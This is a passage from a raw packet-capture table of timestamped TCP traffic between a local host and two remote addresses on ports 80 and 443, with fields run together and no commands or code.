                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.168824911 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.168869972 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.168948889 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.168993950 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.170331955 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.170380116 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.170464039 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.170506001 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.171866894 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.171911955 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.172009945 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.172054052 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.173492908 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.173557043 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.173644066 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.173691034 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.174951077 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.175009966 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.175081015 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.175127983 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.176486015 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.176539898 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.176610947 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.176657915 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.177985907 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.178034067 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.178105116 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.178145885 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.179450989 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.179495096 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.179625988 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.179668903 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.180907965 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.180949926 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.181050062 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.181096077 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.182507038 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.182547092 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.182627916 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.182670116 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.183856964 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.183914900 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.183967113 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.184010029 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.185352087 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.185405016 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.185487986 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.185532093 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.186805010 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.186856985 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.186885118 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.186925888 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.188214064 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.188262939 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.188366890 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.188414097 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.189620018 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.189662933 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.189819098 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.189862967 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.191039085 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.191082954 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.191150904 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.191190004 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.192579031 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.192614079 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.192692995 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.192738056 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.194252968 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.194303036 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.194376945 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.194417953 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.195353985 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.195395947 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.195488930 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.195528984 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.196762085 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.196805000 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.196907997 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.196954012 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.198084116 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.198137045 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.198196888 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.198241949 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.199287891 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.199340105 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.199421883 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.199465036 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.199884892 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.199923038 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.199965000 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.200006008 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.200757980 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.200797081 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.200872898 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.200913906 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.201596022 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.201642990 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.201720953 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.201765060 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.202490091 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.202532053 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.202600956 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.202641010 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.203412056 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.203466892 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.203506947 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.203547955 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.204253912 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.204297066 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.204364061 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.204406023 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.205210924 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.205248117 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.205302000 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.205352068 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.206041098 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.206085920 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.206160069 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.206204891 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.206861973 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.206913948 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.206984997 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.207029104 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.207752943 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.207798958 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.207911015 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.207958937 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.208648920 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.208702087 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.208894968 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.208940029 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.209526062 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.209568024 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.209624052 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.209662914 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.210437059 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.210499048 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.210541010 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.210582018 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.211291075 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.211342096 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.211417913 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.211462975 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.212225914 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.212342024 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.212357998 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.212409973 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.213203907 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.213248014 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.213327885 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.213367939 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.214008093 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.214049101 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.214190006 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.214225054 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.214859962 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.214901924 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.215029955 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.215071917 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.215779066 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.215835094 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.215917110 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.215958118 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.341664076 CET4434980220.233.83.145192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.341931105 CET4434980220.233.83.145192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.341990948 CET49802443192.168.2.420.233.83.145
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.342000961 CET4434980220.233.83.145192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.342020035 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.342041016 CET49802443192.168.2.420.233.83.145
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.342056990 CET4434980220.233.83.145192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.342084885 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.342109919 CET49802443192.168.2.420.233.83.145
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.342184067 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.342225075 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.342448950 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.342490911 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.342663050 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.342709064 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.343349934 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.343401909 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.343483925 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.343525887 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.344228983 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.344284058 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.344449997 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.344496012 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.344592094 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.344638109 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.345335007 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.345390081 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.345468044 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.345509052 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.346271992 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.346327066 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.346424103 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.346472979 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.347130060 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.347183943 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.347290039 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.347338915 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.347980976 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.348073959 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.348109961 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.348248959 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.348987103 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.349041939 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.349075079 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.349122047 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.349744081 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.349783897 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.349858046 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.349895000 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.350670099 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.350708961 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.350756884 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.350800037 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.351530075 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.351568937 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.351666927 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.351725101 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.352502108 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.352545977 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.352932930 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.352973938 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.353311062 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.353355885 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.353427887 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.353471994 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.354201078 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.354244947 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.354321003 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.354362965 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.355084896 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.355127096 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.355194092 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.355236053 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.355988026 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.356034994 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.356075048 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.356116056 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.356833935 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.356874943 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.356952906 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.356993914 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.357712030 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.357755899 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.357805014 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.357846975 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.358576059 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.358613968 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.358711958 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.358773947 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.359458923 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.359503031 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.359580040 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.359623909 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.360358000 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.360405922 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.360485077 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.360538006 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.361229897 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.361274958 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.361335993 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.361390114 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.362117052 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.362191916 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.362236023 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.362276077 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.363013983 CET804980431.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.363065958 CET4980480192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:45.363234997 CET804980431.41.244.11192.168.2.4
